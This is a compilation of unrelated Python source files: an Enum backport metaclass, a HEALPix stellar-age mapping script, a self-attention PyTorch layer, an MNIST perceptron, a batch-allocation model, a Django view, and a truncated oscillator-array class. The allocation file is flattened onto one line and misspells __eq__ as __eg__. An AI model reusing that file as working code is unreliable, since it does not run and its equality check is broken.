        for name in ('__repr__', '__str__', '__format__', '__reduce_ex__'):
            class_method = getattr(enum_class, name)
            obj_method = getattr(member_type, name, None)
            enum_method = getattr(first_enum, name, None)
            if name not in classdict and class_method is not enum_method:
                if name == '__reduce_ex__' and unpicklable:
                    continue
                setattr(enum_class, name, enum_method)

        # method resolution and int's are not playing nice
        # Python's less than 2.6 use __cmp__

        if pyver < 2.6:

            if issubclass(enum_class, int):
                setattr(enum_class, '__cmp__', getattr(int, '__cmp__'))

        elif pyver < 3.0:

            if issubclass(enum_class, int):
                for method in (
                        '__le__',
                        '__lt__',
                        '__gt__',
                        '__ge__',
                        '__eq__',
                        '__ne__',
                        '__hash__',
                        ):
                    setattr(enum_class, method, getattr(int, method))

        # replace any other __new__ with our own (as long as Enum is not None,
        # anyway) -- again, this is to support pickle
        if Enum is not None:
            # if the user defined their own __new__, save it before it gets
            # clobbered in case they subclass later
            if save_new:
                setattr(enum_class, '__member_new__', enum_class.__dict__['__new__'])
            setattr(enum_class, '__new__', Enum.__dict__['__new__'])
        return enum_class

    def __bool__(cls):
        """
        classes/types should always be True.
        """
        return True

    def __call__(cls, value, names=None, module=None, type=None, start=1):
        """Either returns an existing member, or creates a new enum class.

        This method is used both when an enum class is given a value to match
        to an enumeration member (i.e. Color(3)) and for the functional API
        (i.e. Color = Enum('Color', names='red green blue')).

        When used for the functional API: `module`, if set, will be stored in
        the new class' __module__ attribute; `type`, if set, will be mixed in
        as the first base class.

        Note: if `module` is not set this routine will attempt to discover the
        calling module by walking the frame stack; if this is unsuccessful
        the resulting class will not be pickleable.

        """
        if names is None:  # simple value lookup
            return cls.__new__(cls, value)
        # otherwise, functional API: we're creating a new Enum type
        return cls._create_(value, names, module=module, type=type, start=start)

    def __contains__(cls, member):
        return isinstance(member, cls) and member.name in cls._member_map_

    def __delattr__(cls, attr):
        # nicer error message when someone tries to delete an attribute
        # (see issue19025).
        if attr in cls._member_map_:
            raise AttributeError(
                    "%s: cannot delete Enum member." % cls.__name__)
        super(EnumMeta, cls).__delattr__(attr)

    def __dir__(self):
        return (['__class__', '__doc__', '__members__', '__module__'] +
                self._member_names_)

    @property
    def __members__(cls):
        """Returns a mapping of member name->value.

        This mapping lists all enum members, including aliases. Note that this
        is a copy of the internal mapping.

        """
        return cls._member_map_.copy()

    def __getattr__(cls, name):
        """Return the enum member matching `name`

        We use __getattr__ instead of descriptors or inserting into the enum
        class' __dict__ in order to support `name` and `value` being both
        properties for enum members (which live in the class' __dict__) and
        enum members themselves.

        """
        if _is_dunder(name):
            raise AttributeError(name)
        try:
            return cls._member_map_[name]
        except KeyError:
            raise AttributeError(name)

    def __getitem__(cls, name):
        return cls._member_map_[name]

    def __iter__(cls):
        return (cls._member_map_[name] for name in cls._member_names_)

    def __reversed__(cls):
        return (cls._member_map_[name] for name in reversed(cls._member_names_))

    def __len__(cls):
        return len(cls._member_names_)

    # Python 2 spelling of the truthiness hook.
    __nonzero__ = __bool__

    def __repr__(cls):
        return "<enum %r>" % cls.__name__

    def __setattr__(cls, name, value):
        """Block attempts to reassign Enum members.

        A simple assignment to the class namespace only changes one of the
        several possible ways to get an Enum member from the Enum class,
        resulting in an inconsistent Enumeration.

        """
        member_map = cls.__dict__.get('_member_map_', {})
        if name in member_map:
            raise AttributeError('Cannot reassign members.')
        super(EnumMeta, cls).__setattr__(name, value)

    def _create_(cls, class_name, names=None, module=None, type=None, start=1):
        """Convenience method to create a new Enum class.

        `names` can be:

        * A string containing member names, separated either with spaces or
          commas.  Values are auto-numbered from 1.
        * An iterable of member names.  Values are auto-numbered from 1.
        * An iterable of (member name, value) pairs.
        * A mapping of member name -> value.

        """
        if pyver < 3.0:
            # if class_name is unicode, attempt a conversion to ASCII
            if isinstance(class_name, unicode):
                try:
                    class_name = class_name.encode('ascii')
                except UnicodeEncodeError:
                    raise TypeError('%r is not representable in ASCII' % class_name)
        metacls = cls.__class__
        if type is None:
            bases = (cls, )
        else:
            bases = (type, cls)
        classdict = metacls.__prepare__(class_name, bases)
        __order__ = []

        # special processing needed for names?
        if isinstance(names, basestring):
            names = names.replace(',', ' ').split()
        if isinstance(names, (tuple, list)) and isinstance(names[0], basestring):
            names = [(e, i+start) for (i, e) in enumerate(names)]

        # Here, names is either an iterable of (name, value) or a mapping.
        item = None  # in case names is empty
        for item in names:
            if isinstance(item, basestring):
                member_name, member_value = item, names[item]
            else:
                member_name, member_value = item
            classdict[member_name] = member_value
            __order__.append(member_name)
        # only set __order__ in classdict if name/value was not from a mapping
        if not isinstance(item, basestring):
            classdict['__order__'] = ' '.join(__order__)

        enum_class = metacls.__new__(metacls, class_name, bases, classdict)

        # TODO: replace the frame hack if a blessed way to know the calling
        # module is ever developed
        if module is None:
            try:
                module = _sys._getframe(2).f_globals['__name__']
            except (AttributeError, ValueError):
                pass
        if module is None:
            _make_class_unpicklable(enum_class)
        else:
            enum_class.__module__ = module

        return enum_class

    @staticmethod
    def _get_mixins_(bases):
        """Returns the type for creating enum members, and the first inherited
        enum class.

        bases: the tuple of bases that was given to __new__

        """
        if not bases or Enum is None:
            return object, Enum

        # double check that we are not subclassing a class with existing
        # enumeration members; while we're at it, see if any other data
        # type has been mixed in so we can use the correct __new__
        member_type = first_enum = None
        for base in bases:
            if  (base is not Enum and
                    issubclass(base, Enum) and
                    base._member_names_):
                raise TypeError("Cannot extend enumerations")
        # base is now the last base in bases
        if not issubclass(base, Enum):
            raise TypeError("new enumerations must be created as "
                    "`ClassName([mixin_type,] enum_type)`")

        # get correct mix-in type (either mix-in type of Enum subclass, or
        # first base if last base is Enum)
        if not issubclass(bases[0], Enum):
            member_type = bases[0]     # first data type
            first_enum = bases[-1]  # enum type
        else:
            for base in bases[0].__mro__:
                # most common: (IntEnum, int, Enum, object)
                # possible:    (<Enum 'AutoIntEnum'>, <Enum 'IntEnum'>,
                #               <class 'int'>, <Enum 'Enum'>,
                #               <class 'object'>)
                if issubclass(base, Enum):
                    if first_enum is None:
                        first_enum = base
                else:
                    if member_type is None:
                        member_type = base

        return member_type, first_enum

    if pyver < 3.0:
        @staticmethod
        def _find_new_(classdict, member_type, first_enum):
            """Returns the __new__ to be used for creating the enum members.

            classdict: the class dictionary given to __new__
            member_type: the data type whose __new__ will be used by default
            first_enum: enumeration to check for an overriding __new__

            """
            # now find the correct __new__, checking to see of one was defined
            # by the user; also check earlier enum classes in case a __new__ was
            # saved as __member_new__
            __new__ = classdict.get('__new__', None)
            if __new__:
                return None, True, True      # __new__, save_new, use_args

            N__new__ = getattr(None, '__new__')
            O__new__ = getattr(object, '__new__')
            if Enum is None:
                E__new__ = N__new__
            else:
                E__new__ = Enum.__dict__['__new__']
            # check all possibles for __member_new__ before falling back to
            # __new__
            for method in ('__member_new__', '__new__'):
                for possible in (member_type, first_enum):
                    try:
                        target = possible.__dict__[method]
                    except (AttributeError, KeyError):
                        target = getattr(possible, method, None)
                    if target not in [
                            None,
                            N__new__,
                            O__new__,
                            E__new__,
                            ]:
                        if method == '__member_new__':
                            classdict['__new__'] = target
                            return None, False, True
                        if isinstance(target, staticmethod):
                            target = target.__get__(member_type)
                        __new__ = target
                        break
                if __new__ is not None:
                    break
            else:
                __new__ = object.__new__

            # if a non-object.__new__ is used then whatever value/tuple was
            # assigned to the enum member name will be passed to __new__ and to the
            # new enum member's __init__
            if __new__ is object.__new__:
                use_args = False
            else:
                use_args = True

            return __new__, False, use_args
    else:
        @staticmethod
        def _find_new_(classdict, member_type, first_enum):
            """Returns the __new__ to be used for creating the enum members.

            classdict: the class dictionary given to __new__
            member_type: the data type whose __new__ will be used by default
            first_enum: enumeration to check for an overriding __new__

            """
            # now find the correct __new__, checking to see of one was defined
            # by the user; also check earlier enum classes in case a __new__ was
            # saved as __member_new__
            __new__ = classdict.get('__new__', None)

            # should __new__ be saved as __member_new__ later?
            save_new = __new__ is not None

            if __new__ is None:
                # check all possibles for __member_new__ before falling back to
                # __new__
                for method in ('__member_new__', '__new__'):
                    for possible in (member_type, first_enum):
                        target = getattr(possible, method, None)
                        if target not in (
                                None,
                                None.__new__,
                                object.__new__,
                                Enum.__new__,
                                ):
                            __new__ = target
                            break
                    if __new__ is not None:
                        break
                else:
                    __new__ = object.__new__

            # if a non-object.__new__ is used then whatever value/tuple was
            # assigned to the enum member name will be passed to __new__ and to the
            # new enum member's __init__
            if __new__ is object.__new__:
                use_args = False
            else:
                use_args = True

            return __new__, save_new, use_args


########################################################
# In order to support Python 2 and 3 with a single
# codebase we have to create the Enum methods separately
# and then use the `type(name, bases, dict)` method to
# create the class.
########################################################

temp_enum_dict = {}
temp_enum_dict['__doc__'] = "Generic enumeration.\n\n    Derive from this class to define new enumerations.\n\n"

def __new__(cls, value):
    # all enum instances are actually created during class construction
    # without calling this method; this method is called by the metaclass'
    # __call__ (i.e. Color(3) ), and by pickle
    if type(value) is cls:
        # For lookups like Color(Color.red)
        value = value.value
        #return value
    # by-value search for a matching enum member
    # see if it's in the reverse mapping (for hashable values)
    try:
        if value in cls._value2member_map_:
            return cls._value2member_map_[value]
    except TypeError:
        # not there, now do long search -- O(n) behavior
        for member in cls._member_map_.values():
            if member.value == value:
                return member
    raise ValueError("%s is not a valid %s" % (value, cls.__name__))
temp_enum_dict['__new__'] = __new__
del __new__

def __repr__(self):
    return "<%s.%s: %r>" % (
            self.__class__.__name__, self._name_, self._value_)
temp_enum_dict['__repr__'] = __repr__
del __repr__

def __str__(self):
    return "%s.%s" % (self.__class__.__name__, self._name_)
temp_enum_dict['__str__'] = __str__
del __str__

if pyver >= 3.0:
    def __dir__(self):
        added_behavior = [
                m
                for cls in self.__class__.mro()
                for m in cls.__dict__
                if m[0] != '_' and m not in self._member_map_
                ]
        return (['__class__', '__doc__', '__module__', ] + added_behavior)
    temp_enum_dict['__dir__'] = __dir__
    del __dir__

def __format__(self, format_spec):
    # mixed-in Enums should use the mixed-in type's __format__, otherwise
    # we can get strange results with the Enum name showing up instead of
    # the value

    # pure Enum branch
    if self._member_type_ is object:
        cls = str
        val = str(self)
    # mix-in branch
    else:
        cls = self._member_type_
        val = self.value
    return cls.__format__(val, format_spec)
temp_enum_dict['__format__'] = __format__
del __format__


####################################
# Python's less than 2.6 use __cmp__

if pyver < 2.6:

    def __cmp__(self, other):
        if type(other) is self.__class__:
            if self is other:
                return 0
            return -1
        return NotImplemented
        raise TypeError("unorderable types: %s() and %s()" % (self.__class__.__name__, other.__class__.__name__))
    temp_enum_dict['__cmp__'] = __cmp__
    del __cmp__

else:

    def __le__(self, other):
        raise TypeError("unorderable types: %s() <= %s()" % (self.__class__.__name__, other.__class__.__name__))
    temp_enum_dict['__le__'] = __le__
    del __le__

    def __lt__(self, other):
        raise TypeError("unorderable types: %s() < %s()" % (self.__class__.__name__, other.__class__.__name__))
    temp_enum_dict['__lt__'] = __lt__
    del __lt__

    def __ge__(self, other):
        raise TypeError("unorderable types: %s() >= %s()" % (self.__class__.__name__, other.__class__.__name__))
    temp_enum_dict['__ge__'] = __ge__
    del __ge__

    def __gt__(self, other):
        raise TypeError("unorderable types: %s() > %s()" % (self.__class__.__name__, other.__class__.__name__))
    temp_enum_dict['__gt__'] = __gt__
    del __gt__


def __eq__(self, other):
    if type(other) is self.__class__:
        return self is other
    return NotImplemented
temp_enum_dict['__eq__'] = __eq__
del __eq__

def __ne__(self, other):
    if type(other) is self.__class__:
        return self is not other
    return NotImplemented
temp_enum_dict['__ne__'] = __ne__
del __ne__

def __hash__(self):
    return hash(self._name_)
temp_enum_dict['__hash__'] = __hash__
del __hash__

def __reduce_ex__(self, proto):
    return self.__class__, (self._value_, )
temp_enum_dict['__reduce_ex__'] = __reduce_ex__
del __reduce_ex__

# _RouteClassAttributeToGetattr is used to provide access to the `name`
# and `value` properties of enum members while keeping some measure of
# protection from modification, while still allowing for an enumeration
# to have members named `name` and `value`.  This works because enumeration
# members are not set directly on the enum class -- __getattr__ is
# used to look them up.
@_RouteClassAttributeToGetattr
def name(self):
    # The member's name; instance access only (class access falls through to
    # EnumMeta.__getattr__ so a member may itself be called `name`).
    return self._name_
temp_enum_dict['name'] = name
del name

@_RouteClassAttributeToGetattr
def value(self):
    # The member's value; instance access only, same mechanism as `name`.
    return self._value_
temp_enum_dict['value'] = value
del value

@classmethod
def _convert(cls, name, module, filter, source=None):
    """
    Create a new Enum subclass that replaces a collection of global constants
    """
    # convert all constants from source (or module) that pass filter() to
    # a new Enum called name, and export the enum and its members back to
    # module;
    # also, replace the __reduce_ex__ method so unpickling works in
    # previous Python versions
    module_globals = vars(_sys.modules[module])
    if source:
        source = vars(source)
    else:
        source = module_globals
    members = dict((name, value) for name, value in source.items() if filter(name))
    cls = cls(name, members, module=module)
    cls.__reduce_ex__ = _reduce_ex_by_name
    module_globals.update(cls.__members__)
    module_globals[name] = cls
    return cls
temp_enum_dict['_convert'] = _convert
del _convert

# Bootstrap: build the real Enum class from the methods collected above.
Enum = EnumMeta('Enum', (object, ), temp_enum_dict)
del temp_enum_dict

# Enum has now been created
###########################

class IntEnum(int, Enum):
    """Enum where members are also (and must be) ints"""


def _reduce_ex_by_name(self, proto):
    # Pickle converted constants by name (see _convert above).
    return self.name

def unique(enumeration):
    """Class decorator that ensures only unique members exist in an enumeration."""
    duplicates = []
    for name, member in enumeration.__members__.items():
        # An alias is a name whose canonical member carries a different name.
        if name != member.name:
            duplicates.append((name, member.name))
    if duplicates:
        duplicate_names = ', '.join(
                ["%s -> %s" % (alias, name) for (alias, name) in duplicates]
                )
        raise ValueError('duplicate names found in %r: %s' %
                (enumeration, duplicate_names)
                )
    return enumeration
python
#!/usr/bin/env python
# One-off analysis script: build Mollweide sky maps of stellar ages from a
# LAMOST catalog and the Ness et al. 2016 APOGEE catalog using HEALPix
# binning.  Input paths are hard-coded to the author's machine.

import numpy as np
import healpy as hp
import astropy.table as Table
import matplotlib.pyplot as plt
from matplotlib import cm
from matplotlib import rc
from matplotlib import rcParams
from matplotlib.colors import LogNorm
plt.rc('text', usetex=True)
plt.rc('font', family='serif')
import pyfits

print("Import data")
# import the data
hdulist = pyfits.open(
        "/Users/annaho/Data/LAMOST/Mass_And_Age/catalog_paper.fits")
tbdata = hdulist[1].data
# # cols = hdulist[1].columns
# # cols.names
in_martig_range = tbdata.field("in_martig_range")
snr = tbdata.field("snr")
#choose = np.logical_and(in_martig_range, snr > 80)
choose = in_martig_range
print(sum(choose))
chisq = tbdata.field("chisq")
ra_lamost = tbdata.field('ra')[choose]
dec_lamost = tbdata.field('dec')[choose]
# cannon_age is stored as log10(age); convert to linear age here.
val_lamost = 10**(tbdata.field("cannon_age")[choose])
hdulist.close()

print("Getting APOGEE data")
hdulist = pyfits.open(
        "/Users/annaho/Data/APOGEE/Ness2016_Catalog_Full_DR12_Info.fits")
tbdata = hdulist[1].data
ra_apogee_all = tbdata['RA']
dec_apogee_all = tbdata['DEC']
# lnAge is a natural log; exp() gives linear age.
val_apogee_all = np.exp(tbdata['lnAge'])
# -9999-style sentinels mark missing coordinates/ages; > -90 filters them out.
good_coords = np.logical_and(ra_apogee_all > -90, dec_apogee_all > -90)
good = np.logical_and(good_coords, val_apogee_all > -90)
ra_apogee = ra_apogee_all[good]
dec_apogee = dec_apogee_all[good]
val_apogee = val_apogee_all[good]
hdulist.close()

ra_both = np.hstack((ra_apogee, ra_lamost))
dec_both = np.hstack((dec_apogee, dec_lamost))
val_all = np.hstack((val_apogee, val_lamost))

print("create grid")
# create a RA and Dec grid (0.5-degree spacing; only used by the commented-out
# projplot examples below)
ra_all = []
dec_all = []
for ra in np.arange(0, 360, 0.5):
    for dec in np.arange(-90, 90, 0.5):
        ra_all.append(ra)
        dec_all.append(dec)
ra = np.array(ra_all)
dec = np.array(dec_all)

# convert RA and Dec to phi and theta coordinates
def toPhiTheta(ra, dec):
    """Convert RA/Dec in degrees to healpy spherical angles in radians
    (phi = azimuth, theta = colatitude measured from the north pole)."""
    phi = ra * np.pi/180.
    theta = (90.0 - dec) * np.pi / 180.
    return phi, theta

phi, theta = toPhiTheta(ra, dec)
phi_lamost, theta_lamost = toPhiTheta(ra_lamost, dec_lamost)
phi_apogee, theta_apogee = toPhiTheta(ra_apogee, dec_apogee)
phi_all, theta_all = toPhiTheta(ra_both, dec_both)

# to just plot all points, do
#hp.visufunc.projplot(theta, phi, 'bo')
#hp.visufunc.projplot(theta_lamost, phi_lamost, 'bo')
#hp.visufunc.graticule() # just the bare background w/ lines
# more examples are here
# https://healpy.readthedocs.org/en/latest/generated/healpy.visufunc.projplot.html#healpy.visufunc.projplot

## to plot a 2D histogram in the Mollweide projection
# define the HEALPIX level
# NSIDE = 32 # defines the resolution of the map
# NSIDE = 128 # from paper 1
NSIDE = 64

# find the pixel ID for each point
# pix = hp.pixelfunc.ang2pix(NSIDE, theta, phi)
pix_lamost = hp.pixelfunc.ang2pix(NSIDE, theta_lamost, phi_lamost)
pix_apogee = hp.pixelfunc.ang2pix(NSIDE, theta_apogee, phi_apogee)
pix_all = hp.pixelfunc.ang2pix(NSIDE, theta_all, phi_all)
# pix is in the order of ra and dec

# prepare the map array: each HEALPix pixel gets the median age of the stars
# falling in it; pixels with no stars are masked out.
m_lamost = hp.ma(np.zeros(hp.nside2npix(NSIDE), dtype='float'))
mask_lamost = np.zeros(hp.nside2npix(NSIDE), dtype='bool')
for pix_val in np.unique(pix_lamost):
    choose = np.where(pix_lamost==pix_val)[0]
    if len(choose) == 1:
        # #m_lamost[pix_val] = rmag_lamost[choose[0]]
        m_lamost[pix_val] = val_lamost[choose[0]]
    else:
        #m_lamost[pix_val] = np.median(rmag_lamost[choose])
        m_lamost[pix_val] = np.median(val_lamost[choose])
mask_lamost[np.setdiff1d(np.arange(len(m_lamost)), pix_lamost)] = 1
m_lamost.mask = mask_lamost

m_apogee= hp.ma(np.zeros(hp.nside2npix(NSIDE), dtype='float'))
mask_apogee= np.zeros(hp.nside2npix(NSIDE), dtype='bool')
for pix_val in np.unique(pix_apogee):
    choose = np.where(pix_apogee==pix_val)[0]
    if len(choose) == 1:
        m_apogee[pix_val] = val_apogee[choose[0]]
    else:
        m_apogee[pix_val] = np.median(val_apogee[choose])
mask_apogee[np.setdiff1d(np.arange(len(m_apogee)), pix_apogee)] = 1
m_apogee.mask = mask_apogee

m_all = hp.ma(np.zeros(hp.nside2npix(NSIDE), dtype='float'))
mask_all= np.zeros(hp.nside2npix(NSIDE), dtype='bool')
for pix_val in np.unique(pix_all):
    choose = np.where(pix_all==pix_val)[0]
    if len(choose) == 1:
        m_all[pix_val] = val_all[choose[0]]
    else:
        m_all[pix_val] = np.median(val_all[choose])
mask_all[np.setdiff1d(np.arange(len(m_all)), pix_all)] = 1
m_all.mask = mask_all

# perceptually uniform: inferno, viridis, plasma, magma
#cmap=cm.magma
cmap = cm.RdYlBu_r
# NOTE(review): set_under mutates the shared registered colormap object in
# older matplotlib; newer versions want a copy — confirm before upgrading.
cmap.set_under('w')

# composite map
# plot map ('C' means the input coordinates were in the equatorial system)
# rcParams.update({'font.size':16})
hp.visufunc.mollview(m_apogee, coord=['C','G'], rot=(150, 0, 0), flip='astro',
        notext=False, title=r'Ages from Ness et al. 2016 (APOGEE)', cbar=True,
        norm=None, min=0, max=12, cmap=cmap, unit = 'Gyr')
#hp.visufunc.mollview(m_lamost, coord=['C','G'], rot=(150, 0, 0), flip='astro',
#        notext=True, title=r'$\alpha$/M for 500,000 LAMOST giants', cbar=True,
#        norm=None, min=-0.07, max=0.3, cmap=cmap, unit = r'$\alpha$/M [dex]')
        #notext=True, title="r-band magnitude for 500,000 LAMOST giants", cbar=True,
        #norm=None, min=11, max=17, cmap=cmap, unit = r"r-band magnitude [mag]")
# hp.visufunc.mollview(m_all, coord=['C','G'], rot=(150, 0, 0), flip='astro',
#         notext=True, title='Ages from Ness et al. 2016 + LAMOST giants',
#         cbar=True, norm=None, min=0.00, max=12, cmap=cmap, unit = 'Gyr')

hp.visufunc.graticule()
plt.show()
#plt.savefig("full_age_map.png")
#plt.savefig("apogee_age_map.png")
#plt.savefig("lamost_am_map_magma.png")
#plt.savefig("lamost_rmag_map.png")
python
import torch
from torch import nn
import torch.nn.functional as F


class SelfAttention2d(nn.Module):
    """SAGAN-style self-attention over 2-D feature maps.

    Query/key projections use C//8 channels, the value projection C//2;
    key and value are 2x2 max-pooled to quarter the attention cost.  The
    attended features are blended back into the input through a learnable
    gain ``gamma`` initialised to zero, so the layer starts as identity.
    """

    def __init__(self, in_channels, spectral_norm=True):
        super(SelfAttention2d, self).__init__()
        self.in_channels = in_channels
        # 1x1 projection convolutions (no bias), created in a fixed order
        # so parameter initialisation is reproducible.
        self.theta = nn.Conv2d(self.in_channels, self.in_channels // 8,
                               kernel_size=1, padding=0, bias=False)
        self.phi = nn.Conv2d(self.in_channels, self.in_channels // 8,
                             kernel_size=1, padding=0, bias=False)
        self.g = nn.Conv2d(self.in_channels, self.in_channels // 2,
                           kernel_size=1, padding=0, bias=False)
        self.o = nn.Conv2d(self.in_channels // 2, self.in_channels,
                           kernel_size=1, padding=0, bias=False)
        if spectral_norm is True:
            # Wrap each projection with spectral normalisation in place.
            for attr in ('theta', 'phi', 'g', 'o'):
                setattr(self, attr, nn.utils.spectral_norm(getattr(self, attr)))
        # Learnable gain on the attention branch; zero init => identity map.
        self.gamma = nn.Parameter(torch.tensor(0.0), requires_grad=True)

    def forward(self, x, y=None):
        """Return ``x + gamma * attention(x)``; ``y`` is accepted but unused."""
        n_pix = x.shape[2] * x.shape[3]
        # Project and flatten the spatial dimensions.
        query = self.theta(x).view(-1, self.in_channels // 8, n_pix)
        key = F.max_pool2d(self.phi(x), [2, 2]).view(
            -1, self.in_channels // 8, n_pix // 4)
        value = F.max_pool2d(self.g(x), [2, 2]).view(
            -1, self.in_channels // 2, n_pix // 4)
        # Attention weights over the pooled positions.
        attn = F.softmax(torch.bmm(query.transpose(1, 2), key), -1)
        # Aggregate values, restore the spatial layout, project back to C.
        attended = torch.bmm(value, attn.transpose(1, 2))
        out = self.o(attended.view(-1, self.in_channels // 2,
                                   x.shape[2], x.shape[3]))
        return self.gamma * out + x
python
#coding:utf-8
#Author:Dustin
#Algorithm: single-layer perceptron (binary classification)
'''
Dataset: Mnist
Training set size: 60000
Test set size: 10000
------------------------------
Reported run:
accuracy: 80.29% (binary)
runtime: 78.55s
'''

import numpy as np
import time


class Perceptron:
    """Single-layer perceptron for binary classification.

    Labels must be +1 / -1.  Trained with the classic perceptron
    stochastic-gradient update rule.
    """

    # Record the number of training epochs and the learning rate.
    def __init__(self, iteration = 30, learning_rate = 0.001):
        self.iteration = iteration
        self.rate = learning_rate

    # Learn the weight vector w and bias b from the training set.
    def fit(self, train_data, train_label):
        """Train on (train_data, train_label); stores self.w and self.b."""
        print("开始训练")
        data = np.mat(train_data)       # matrix form makes the linear algebra below read naturally
        label = np.mat(train_label).T   # column vector of +1/-1 labels
        m, n = np.shape(data)
        w = np.zeros((1, n))            # weight row vector
        b = 0                           # bias term
        iteration = self.iteration
        rate = self.rate
        for i in range(iteration):
            # One pass over all m training samples per epoch.
            for j in range(m):
                xi = data[j]            # one sample as a 1 x n matrix
                yi = label[j]           # its label
                # Perceptron criterion: misclassified when -y(wx + b) >= 0.
                result = -1 * yi * (w * xi.T + b)
                if result >= 0:
                    # SGD update; yi must precede xi to keep matrix shapes right.
                    w += rate * (yi * xi)
                    b += rate * yi      # was "b += + rate * yi" -- redundant unary plus removed
            print('\r迭代进度|%-50s| [%d/%d]' % ('█' * int((i / iteration) * 50 + 2), i + 1, iteration), end='')  # draw the progress bar
        self.w = w                      # persist the learned parameters
        self.b = b
        print("\n结束训练")

    # Predict labels for a test set using the fitted parameters.
    def predict(self, test_data):
        """Return a 1-D numpy array of predicted labels (+1 / -1)."""
        print("开始预测")
        data = np.mat(test_data)
        m, n = np.shape(data)
        predict_label = []
        w = self.w                      # read the fitted w and b
        b = self.b
        for i in range(m):
            xi = data[i]
            # BUG FIX: extract the scalar with [0, 0].  np.sign() on the 1x1
            # matrix product returned 1x1 matrices, so np.array(predict_label)
            # was 3-D and np.mat() in score() raised
            # "matrix must be 2-dimensional" on modern numpy.
            result = np.sign(w * xi.T + b)[0, 0]
            predict_label.append(result)
        print("结束预测")
        return np.array(predict_label)

    # Compute prediction accuracy on a labelled test set.
    def score(self, test_data, test_label):
        """Return the fraction of correctly classified samples in [0, 1]."""
        predict_label = np.mat(self.predict(test_data)).T
        test_label = np.mat(test_label).T
        m, n = np.shape(test_label)
        error = 0
        for i in range(m):
            if (predict_label[i] != test_label[i]):
                error += 1
        accuracy = 1 - (error / m)
        return accuracy


if __name__ == '__main__':
    # Deferred import: keras is only needed to download MNIST for this demo
    # run, so importing the module no longer requires keras to be installed.
    from keras.datasets import mnist

    # Flatten each 28*28 image into a 1*784 vector, and binarize the labels
    # (a single-layer perceptron can only separate two classes).
    (train_data, train_label), (test_data, test_label) = mnist.load_data()
    train_data = np.array([np.array(i).flatten() for i in train_data])
    train_label = np.array([1 if i >= 5 else - 1 for i in train_label])
    test_data = np.array([np.array(i).flatten() for i in test_data])
    test_label = np.array([1 if i >= 5 else - 1 for i in test_label])

    # Time the training and evaluation.
    start = time.time()
    pc = Perceptron(iteration=30, learning_rate=0.001)
    pc.fit(train_data, train_label)
    print("单层感知机预测准确率:%.2f%%" % (pc.score(test_data, test_label)*100))
    end = time.time()
    print("耗时:%.2f s" %(end - start))
python
from __future__ import annotations from dataclasses import dataclass from datetime import date from typing import Optional, Set, List class OutOfStock(Exception): pass def allocate(line: OrderLine, batches: List[Batch]) -> str: try: batch = next( b for b in sorted(batches) if b.can_allocate(line) ) batch.allocate(line) return batch.reference except StopIteration: raise OutOfStock(f'Out of stock for sku {line.sku}') # First cut of domain model for batches @dataclass(frozen=True) class OrderLine: orderid: str sku: str qty: int class Batch: def __init__(self, ref: str, sku: str, qty: int, eta: Optional[date] ): self.reference = ref self.sku = sku self.eta = eta self._purchased_quantity = qty self._allocations = set() # type: Set [OrderLine] def __eg__(self, other): if not isinstance(other, Batch): return False return other.reference == self.reference def __hash__(self): return hash(self.reference) def __gt__(self, other): if self.eta is None: return False if other.eta is None: return True return self.eta > other.eta def allocate(self, line: OrderLine): if self.can_allocate(line): self._allocations.add(line) def deallocate(self, line: OrderLine): if line in self._allocations: self._allocations.remove(line) @property def allocated_quantity(self) -> int: return sum(line.qty for line in self._allocations) @property def available_quantity(self) -> int: return self._purchased_quantity - self.allocated_quantity def can_allocate(self, line: OrderLine) -> bool: return self.sku == line.sku and self.available_quantity >= line.qty
python
from django.shortcuts import render
from .models import Product_origin
from django.http import JsonResponse

# Create your views here.


def product(request):
    """Return product details as JSON for POST requests; otherwise render
    the dashboard template.

    NOTE(review): the POST branch reads the product code from
    request.GET['p'], not request.POST -- presumably the AJAX caller sends
    the code as a URL query parameter; confirm against the client-side code.
    """
    if request.method == "POST":
        product = request.GET['p']  # product code supplied by the client
        # Raises Product_origin.DoesNotExist if the code is unknown.
        product_details = Product_origin.objects.get(Product_code=product)
        print(product_details.Product_name)
        response = {"tab": "propg",
                    "name": product_details.Product_name,
                    "mrp": product_details.Product_mrp,
                    "company": product_details.Product_company}
        return JsonResponse(response)
    else:
        return render(request, 'dash_mobilev3.html')
python
""" construct 2d array of pase state distance array """ import sys import os import re # sys.path.append(os.path.dirname(os.path.dirname(os.path.realpath(__file__)))) from pathlib import Path sys.path.append(Path(__file__).resolve().parents[1]) if __name__ == '__main__' and __package__ is None: __package__ = 'kurosc' import numpy as np from lib.plot_solution import plot_phase from spatialKernel.wavelet import kernel class oscillatorArray(object): def __init__(self, dimension: tuple = (16,16), domain:tuple = (0,np.pi), output_level:int = 3 # not sure if need to be passing this thru ): self.domain = domain self.kernel = kernel() self.ic = self.initial_conditions(*dimension) self.distance = self.distance() self.level = output_level self.plot_phase = plot_phase self.plot_directory = None # initialized in a plot module self.natural_frequency = None # init & evalin model ... self.natural_frequency_dist() #TODO fix this self.interaction_params = None self.kernel_params = None self.gain = None def initial_conditions(self, m:int = 16, n:int = 16, params:dict = {'a': 1/6, 'b': 0, 'c': 2/5, 'order':0, } )->np.ndarray: """rtrn x vals for normal weighted across -pi pi # distinct vals for replace = false """ ### range discerned by eye fig 1 fitting a&c ### 1hz spread --> 2pi t*2pi at 1 s gives 1 rev ### omega = 2pi/s so sin(omega*t) makes sense ### chose np.max(abs(domain)) to scale by pi even if - ### np.max(np.abs(self.domain)) == pi x = np.linspace(params['b']-3.5*params['c'], params['b']+3.5*params['c'], int(1e6) )*np.max(np.abs(self.domain)) prob = self.kernel.wavelet(self.kernel.gaussian, x, *params.values(), True ) prob = prob/np.sum(prob) # pdf for weights rng = np.random.default_rng() phase = rng.choice(x, size=np.prod(m*n), p = prob, replace=False, ).reshape(m,n) print('\nintial contitions in phase space:', np.round(np.mean(phase),3), '\nstdev:', np.round(np.std(phase),3) ) return phase def natural_frequency_dist(self, params:dict = {'a': 1/6, 'b': 0, 'c': 2/5, 
